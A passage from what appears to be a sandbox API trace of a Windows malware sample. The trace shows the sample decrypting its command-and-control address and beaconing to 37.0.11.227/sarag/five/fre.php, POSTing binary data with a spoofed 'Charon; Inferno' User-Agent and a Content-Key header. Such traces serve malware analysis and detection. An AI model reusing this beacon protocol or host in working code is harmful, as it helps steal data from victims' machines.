ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0298.334] GetProcessHeap () returned 0x690000 [0298.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0298.335] GetProcessHeap () returned 0x690000 [0298.335] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0298.335] GetProcessHeap () returned 0x690000 [0298.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0298.336] GetProcessHeap () returned 0x690000 [0298.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0298.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.342] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.348] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0298.356] GetProcessHeap () returned 0x690000 [0298.356] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0298.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.357] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0298.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.358] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.358] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.359] GetProcessHeap () returned 0x690000 [0298.359] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0298.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.360] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0298.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.361] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0298.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.362] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0298.362] GetProcessHeap () returned 0x690000 [0298.362] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0298.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.363] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0298.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.364] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0298.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.365] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0298.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.366] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0298.366] GetProcessHeap () returned 0x690000 [0298.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0298.366] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0298.366] GetProcessHeap () returned 0x690000 [0298.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0298.366] socket (af=2, type=1, protocol=6) returned 0x9c4 [0298.366] connect (s=0x9c4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0298.398] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0298.398] GetProcessHeap () returned 0x690000 [0298.398] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0298.398] GetProcessHeap () returned 0x690000 [0298.398] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0298.399] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0298.400] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0298.401] GetProcessHeap () returned 0x690000 [0298.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0298.401] GetProcessHeap () returned 0x690000 [0298.401] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0298.401] GetProcessHeap () returned 0x690000 [0298.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0298.401] GetProcessHeap () returned 0x690000 [0298.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0298.402] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0298.403] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0298.403] GetProcessHeap () returned 0x690000 [0298.403] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0298.403] GetProcessHeap () returned 0x690000 [0298.404] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0298.404] send (s=0x9c4, buf=0x6ad508*, len=242, flags=0) returned 242 [0298.404] send (s=0x9c4, buf=0x6aba40*, len=159, flags=0) returned 159 [0298.405] GetProcessHeap () returned 0x690000 [0298.405] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0298.405] recv (in: s=0x9c4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0298.486] GetProcessHeap () returned 0x690000 [0298.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0298.487] GetProcessHeap () returned 0x690000 [0298.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0298.487] GetProcessHeap () returned 0x690000 [0298.488] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0298.488] GetProcessHeap () returned 0x690000 [0298.488] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0298.488] closesocket (s=0x9c4) returned 0 [0298.489] GetProcessHeap () returned 0x690000 [0298.489] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0298.489] GetProcessHeap () returned 0x690000 [0298.489] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0298.489] GetProcessHeap () returned 0x690000 [0298.490] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0298.490] GetProcessHeap () returned 0x690000 [0298.490] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0298.490] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x52c) returned 0x9c4 [0298.492] Sleep (dwMilliseconds=0xea60) [0298.493] GetProcessHeap () returned 0x690000 [0298.493] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0298.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.494] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.521] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0298.541] GetProcessHeap () returned 0x690000 [0298.541] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0298.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.542] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0298.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.544] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.545] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.545] GetProcessHeap () returned 0x690000 [0298.545] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0298.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.546] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0298.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.547] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0298.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.551] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0298.551] GetProcessHeap () returned 0x690000 [0298.551] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0298.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.552] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0298.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.553] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0298.554] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.554] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0298.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.555] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0298.555] GetProcessHeap () returned 0x690000 [0298.555] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0298.556] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0298.556] GetProcessHeap () returned 0x690000 [0298.557] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0298.557] GetProcessHeap () returned 0x690000 [0298.557] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0298.557] GetProcessHeap () returned 0x690000 [0298.558] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0298.558] GetProcessHeap () returned 0x690000 [0298.558] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0298.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.559] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.567] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0298.574] GetProcessHeap () returned 0x690000 [0298.574] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0298.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.575] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0298.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.576] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.577] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.577] GetProcessHeap () returned 0x690000 [0298.578] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0298.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.581] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0298.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.589] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0298.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.590] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0298.590] GetProcessHeap () returned 0x690000 [0298.590] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0298.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.592] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0298.595] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.596] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0298.597] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.597] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0298.598] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.599] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0298.599] GetProcessHeap () returned 0x690000 [0298.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0298.599] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0298.599] GetProcessHeap () returned 0x690000 [0298.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0298.599] socket (af=2, type=1, protocol=6) returned 0x9c8 [0298.600] connect (s=0x9c8, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0298.626] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0298.626] GetProcessHeap () returned 0x690000 [0298.626] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0298.626] GetProcessHeap () returned 0x690000 [0298.626] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0298.628] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0298.629] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0298.629] GetProcessHeap () returned 0x690000 [0298.629] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0298.629] GetProcessHeap () returned 0x690000 [0298.630] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0298.630] GetProcessHeap () returned 0x690000 [0298.630] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0298.630] GetProcessHeap () returned 0x690000 [0298.630] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0298.631] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0298.631] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0298.631] GetProcessHeap () returned 0x690000 [0298.631] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0298.631] GetProcessHeap () returned 0x690000 [0298.632] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0298.632] send (s=0x9c8, buf=0x6ad508*, len=242, flags=0) returned 242 [0298.633] send (s=0x9c8, buf=0x6aba40*, len=159, flags=0) returned 159 [0298.634] GetProcessHeap () returned 0x690000 [0298.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0298.634] recv (in: s=0x9c8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0298.711] GetProcessHeap () returned 0x690000 [0298.711] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0298.712] GetProcessHeap () returned 0x690000 [0298.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0298.713] GetProcessHeap () returned 0x690000 [0298.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0298.716] GetProcessHeap () returned 0x690000 [0298.716] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0298.716] closesocket (s=0x9c8) returned 0 [0298.716] GetProcessHeap () returned 0x690000 [0298.716] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0298.717] GetProcessHeap () returned 0x690000 [0298.717] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0298.717] GetProcessHeap () returned 0x690000 [0298.717] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0298.717] GetProcessHeap () returned 0x690000 [0298.718] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0298.718] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x2a4) returned 0x9c8 [0298.721] Sleep (dwMilliseconds=0xea60) [0298.724] GetProcessHeap () returned 0x690000 [0298.724] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0298.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.727] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.732] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0298.738] GetProcessHeap () returned 0x690000 [0298.738] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0298.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.739] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0298.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.739] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0298.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.740] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.740] GetProcessHeap () returned 0x690000 [0298.741] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0298.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.742] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0298.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.743] CryptDestroyKey (hKey=0x69d028) returned 1 [0298.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.743] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0298.743] GetProcessHeap () returned 0x690000 [0298.743] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0298.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.745] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0298.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.746] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0298.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.749] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0298.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0298.750] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0298.750] GetProcessHeap () returned 0x690000 [0298.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0298.750] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0298.750] GetProcessHeap () returned 0x690000 [0298.750] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0298.750] GetProcessHeap () returned 0x690000 [0298.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0298.751] GetProcessHeap () returned 0x690000 [0298.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0298.751] GetProcessHeap () returned 0x690000 [0298.751] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0298.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.752] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0298.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0298.775] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0298.780] GetProcessHeap () returned 0x690000 [0298.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, 